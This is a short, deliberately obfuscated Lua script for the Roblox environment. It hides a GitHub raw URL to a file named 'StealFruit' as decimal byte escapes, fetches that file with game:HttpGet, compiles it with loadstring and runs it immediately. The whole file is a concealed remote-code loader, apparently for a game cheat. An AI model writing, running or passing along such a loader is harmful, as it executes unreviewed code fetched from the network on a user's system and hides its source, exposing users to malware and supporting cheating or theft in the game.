local zQf = getfenv and getfenv() or _ENV
local tL1 = zQf["loadstring"]
local rK3 = zQf["game"]["HttpGet"]
local wSn = zQf["game"]

local function fWv(Sb0)
    local qEu = {}
    for mV9 = 1, #Sb0 do
        qEu[#qEu + 1] = "\\" .. string.byte(Sb0:sub(mV9, mV9))
    end
    return tL1(wSn:HttpGet(tL1("return \"" .. table.concat(qEu) .. "\"")()))
end

local obfURL = "\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\107\105\101\108\56\47\83\99\114\105\112\116\47\114\101\102\115\47\104\101\97\100\115\47\109\97\105\110\47\83\116\101\97\108\70\114\117\105\116"

fWv(obfURL)()
